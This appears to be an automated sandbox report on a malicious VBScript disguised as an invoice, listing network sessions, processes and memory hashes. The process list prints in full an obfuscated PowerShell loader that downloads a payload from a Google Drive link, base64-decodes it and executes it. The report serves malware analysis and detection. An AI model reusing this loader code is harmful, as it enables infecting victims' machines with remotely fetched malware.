                                Apr 18, 2024 11:10:46.074609041 CEST | 1.1.1.1 | 192.168.2.5 | 0x124e | No error (0) | drive.google.com | | 173.194.219.100 | A (IP address) | IN (0x0001) | false
                                Apr 18, 2024 11:10:46.074609041 CEST | 1.1.1.1 | 192.168.2.5 | 0x124e | No error (0) | drive.google.com | | 173.194.219.113 | A (IP address) | IN (0x0001) | false
                                Apr 18, 2024 11:10:46.074609041 CEST | 1.1.1.1 | 192.168.2.5 | 0x124e | No error (0) | drive.google.com | | 173.194.219.102 | A (IP address) | IN (0x0001) | false
                                Apr 18, 2024 11:10:46.648977041 CEST | 1.1.1.1 | 192.168.2.5 | 0xe0d1 | No error (0) | drive.usercontent.google.com | | 142.251.15.132 | A (IP address) | IN (0x0001) | false
                                • drive.google.com
                                • drive.usercontent.google.com
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.5 | 49706 | 173.194.219.101 | 443 | 5960 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-04-18 09:10:46 UTC | 215 | OUT | GET /uc?export=download&id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0 HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.google.com
                                Connection: Keep-Alive
                                2024-04-18 09:10:46 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Thu, 18 Apr 2024 09:10:46 GMT
                                Location: https://drive.usercontent.google.com/download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download
                                Strict-Transport-Security: max-age=31536000
                                Content-Security-Policy: script-src 'nonce-PSu17ZhsIzuAEbUfx4ee3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Cross-Origin-Opener-Policy: same-origin
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.5 | 49707 | 142.251.15.132 | 443 | 5960 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-04-18 09:10:46 UTC | 233 | OUT | GET /download?id=1ofhpnBPLuvCfhTdXGSUznLMdSpVJ13u0&export=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                2024-04-18 09:10:47 UTC | 2120 | IN | HTTP/1.1 200 OK
                                X-GUploader-UploadID: ABPtcPoWPEr_VerKc5NGcVUQjKWh0fnaOqwLnR_bruXODvUx52YXOU5JsNDqLHQ8ltoRSQdpYLY
                                Content-Type: text/html; charset=utf-8
                                Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Thu, 18 Apr 2024 09:10:47 GMT
                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Content-Security-Policy: script-src 'nonce-8ilXso1TUhpfPRo8nlV3Lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Cross-Origin-Resource-Policy: same-site
                                Cross-Origin-Opener-Policy: same-origin
                                reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw0JBisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIibY_rx5o1sAge2r68BAO_cFM0"
                                Content-Length: 1692
                                Server: UploadServer
                                Set-Cookie: NID=513=hnkh5huC6dt6FGERI_C2UY4ScMKU0jCpqqRAlHc-qNOjNMHu3GiJ_1OGIJl-x7GpDWtvEwXP1hvUmcRS7e2fwKhJgUEXqpWfbuhW3Mnz1ranUF0Uk67vI-ooSzgG1DLJ0J35Kzre0G4fkMKlMBvCFzDjUYChTQ6J-nlpeqH1wT4; expires=Fri, 18-Oct-2024 09:10:47 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Content-Security-Policy: sandbox allow-scripts
                                Connection: close
                                2024-04-18 09:10:47 UTC | 1692 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 53 37 49 5a 57 67 6d 4c 50 34 45 73 70 4f 72 49 68 31 43 50 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="QS7IZWgmLP4EspOrIh1CPw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


                                Target ID:0
                                Start time:11:10:40
                                Start date:18/04/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA24021151 - BP.vbs"
                                Imagebase:0x7ff6da870000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:11:10:42
                                Start date:18/04/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. 
';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Fjter 'Nymar$S,ksaoSo,iavMicroeKomplrMorbipapotelRecipuPomacmH.tetpYvo,n.KommiHPathoe SupeaEjenddDialyeProbarAggrasCompo[Fiske$Orbi MVinteaDekorsDiktek.ommaiOrthonUnsetkPagino .ntadVarleeIngrarOversnspille B ss]Anten= Sty,$TalmuH SalseUn.ecl.ampyt RegeaBronzlPell,skofoedDerm i ProjvA.egrideflos Kreei nogtoAlpehn Perisarbe. 
');$Catholicly=Fjter 'App,aoGen,nv HjoreBesoiruredtp,astrl Libeuoeve mVievapVaren.OvergDSy,enoH,lmewV,dtlnDyrehlStadso,egisasammedAriusF .ektitu erlUnr ge,poke(Solen$.olleEBoundx,ostrePrsennGrittcPreheeRottep Div,hSociaa yvel NoncuVic,is Idea,Feltt$GenspHPr vim Ratin FeweiForebn El,mgraads5 Part6Kaste) anus ';$Catholicly=$Fjerdedelsnoderne[1]+$Catholicly;$Hmning56=$Fjerdedelsnoderne[0];Jardiniere (Fjter 'Helfa$ B,skg ionol Baa,oBandobDynebaIndkolRoman:Qui zUMembrnChorad ReeteDrypsrprot k Op keUlvemnTensidUbu.deSputtlCanoes Be.keS rofsB ndb=Forto(AchloTAndedeCot esAandstEncli-ChaotPKat gaOplritMacrohS eti Pr.a$Art,yH FejlmIso.onFossiiQu.ntnT.ctog Reg 5Growt6Shirt) Stri ');while (!$Underkendelses) {Jardiniere (Fjter ' For.$ BasigAgatil .olioArchebfagotawalk,lSakes:KrimiCSkar,aVelafu Ek olidoliiLitigcNedruuBhutslBrevti skov=Relfo$Apocot,iscjr prinuProtoeAstri ') ;Jardiniere $Catholicly;Jardiniere (Fjter ' ntaiSRigsatAttriaAn.ierLoggetFiltr-Unp,lSWarkhlEftere etekeArbejp Linj Kawik4Inapp ');Jardiniere (Fjter ' ,ika$SylfigTeletlHemi o patlbKasi aCruellMestr: LeylUCholen Phl,d CinteRevaprOolitk G,ldeAkvarnN dvudP,ayeeExtenlam.trsA moceRekursFre.m=Dan.e(K imiTSun.oeColopsB andtBox u- AlloPB,odaaregult efeuhCun i aggra$ Kos,H,ynelmEmbryn ArthiMandsn BlesgLight5Indka6Sikke)Tilhr ') ;Jardiniere (Fjter 'Vurde$JernbgStrabl issoUnderb torfa BlomlU,nst:EskalTR ulerErgonidispohAffaleBrillmSpar iLoreno ZoopbDamevo,ursulSmattiS.aveoFinannTauro=Disfu$Racemg M.lilTegneoMagnebsagfraBeslulFissi: BrukR s ame,eilekBiblir and eZygo.e Stjer Asyne everdAcce.eH,rbw+Besky+Under%Lisss$TungmG,reska Ru.lnCockpgBannsrOligoe,olypl.hyto.GavstcSociaoRakkeuS ikanBil at Drak ') ;$Exencephalus=$Gangrel[$Trihemiobolion];}Jardiniere (Fjter 'Repar$DemargSunscl BideoGlycob Chuma Cl.cl Natu:.tninGAlminaSext.l Udpaa aadncStevetBanjeoMetabpAdverh Ps,cl ryggeAculebSurwaiOctaht B.azi,estrsMa.lg Afpud=Spe,i OpbygG Kirke,orspt Subh- DjrvCIntero Se,inOvergtFortjePar nnSk.altRece xtr$TumblHlibermHelafnMa 
olia.tranCordigInt.r5Uddat6Epita ');Jardiniere (Fjter 'Bundf$OutrogJuniolBizaroBesvrb St,ra,urfulTykta: ibizOMonilpBittedOverta VenatS.edieInforrDerobi Aftan Jul gD,stas AdvooRhi or SenddkonjanEsplaiCon.inLnintgeige.1 Ren 3 Kr,g7 Sk.a monos= Ful, Ceme[ lassSOpbl ySmartsD.osctKatj.esu scmStor,.RddikCExamioSlsetnIndbrv Dis eBook.r UdvitSent,]Repr.: Dope:PummeFSummarCarmoo ExodmFlintBAr ejaPyo.es Aeroe sang6 Over4BestrSFamilt SondrFertii PolenBypasgHala,(Ratfi$Gi miGMitisaHo,osl BalaaKontocBnkbltSkibboBostop,randhFrem.l Ca.te c,ilb NewbiEmbartEvindi,sychs Cao,)Betal ');Jardiniere (Fjter 'Lid,b$ConstgSweatlMinasoScripbHoveraU derl Ka,r:Mili.FCarlsu.efallCa,hedBushtgBadeloUre,mdLyk.seResen2 Mam 4 Ov,r4Imma H art=Phlog Mn.de[BindeSDrasty DetusSkilltHo.ogeRullemKnown.Omty Tasylre HellxSli.etHo ed.,ygniESeamsnDeserc UnreoFornidS mmeibestnnGrammg P ni]Unint:Recen:BrnevABorstSditikC Raa,IBourgI For . lfenGplanaePre.rtFore.SUndertQuodlr SulfiBesm.nVitalg Sger(Snigg$Sul.aODepilpUds,rdDidacaUler t Dapie Brsnr MaltiTr.konUndergSquansK,oldoAnticrAnteddSydafnCharsi,nplan bus,g Awa,1Kunde3 Plat7Dyref)Ouden ');Jardiniere (Fjter 'Endev$TheregskriglPinnaoEfterb Ext aFrikel Efte: SagsBEpikujInspae hy.rr Unc.gsundhe rat rGnomos,augh=Fo de$SammeFSuppeuKrantlSnobodDetong ,ervoBrochdUnreceSlaae2 Soli4 Se v4Stueg. Met sPol.tuFor ubSulphs CondtTilfarBestriUndernT aadgSpurv(Huski3Semes2haras7Frime1Ra en6Ind p4Erant, Ajou2Lath 7cring1Amora9Gluie6Koble) Muni ');Jardiniere $Bjergers;"
                                Imagebase:0x7ff7be880000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:11:10:42
                                Start date:18/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:11:10:44
                                Start date:18/04/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $"
                                Imagebase:0x7ff7f64a0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2180723396.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bbe81fff7bb1990f356482965f61567972dd7bca06c7f305e9a1dfd46aa6f72f
                                  • Instruction ID: c25f6cf063f2dcb123ca27624a253c8d5911c8413f80fbac760cc0503fe1b162
                                  • Opcode Fuzzy Hash: bbe81fff7bb1990f356482965f61567972dd7bca06c7f305e9a1dfd46aa6f72f
                                  • Instruction Fuzzy Hash: 3FE1F331E0EACA4FEBA9EF2868556B57BE1EF55390B4801FAD40DC71D3FA28D8018355
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2180723396.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3898c654a2c1ef482ecfe09ae07650257f6c5c9ef27153776f6fa88671214f6c
                                  • Instruction ID: 98e809697bd43616dae25b2270ed0e522ca2e28a355fafc51ff7d08f58c57fb6
                                  • Opcode Fuzzy Hash: 3898c654a2c1ef482ecfe09ae07650257f6c5c9ef27153776f6fa88671214f6c
                                  • Instruction Fuzzy Hash: 23D11231D1EACA9FEBA9AB2868556B67BE0FF55390F0401FAD44DC7193EA1CEC018351
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2180723396.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 799563798e1cdb4fb0a0ce474f572d7aeae3f04f1f6a9d27535529b694645ece
                                  • Instruction ID: d1bd159d3460b62f5e7b32ec14e3e905ce75a6ab9846e22f5b18c6a1709545e6
                                  • Opcode Fuzzy Hash: 799563798e1cdb4fb0a0ce474f572d7aeae3f04f1f6a9d27535529b694645ece
                                  • Instruction Fuzzy Hash: B951B06180E7C55FEBA79B382C285A67FA4EF53254B1D00EBD0C8CB1D3E9089C49C366
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2180723396.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f4b97718376b53f0de714a708b137c549d787b3accc7d9e0cfdcc04169e678a
                                  • Instruction ID: 3e1184706118ee09df835bfa69163e5c1ab8901253278f65eeb9f3fbfd99b4e6
                                  • Opcode Fuzzy Hash: 7f4b97718376b53f0de714a708b137c549d787b3accc7d9e0cfdcc04169e678a
                                  • Instruction Fuzzy Hash: 03419031E1EACA5FEBA5EB28685517576E1FF552A0B9801FAD01DC31E3FE1CE8408315
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2180389933.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction ID: 5581c1bbeeb35668f75aff93aa97cf07b4c35495046711a11288b2c77098a6b1
                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                  • Instruction Fuzzy Hash: 4001677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                  Uniqueness

                                  Uniqueness Score: -1.00%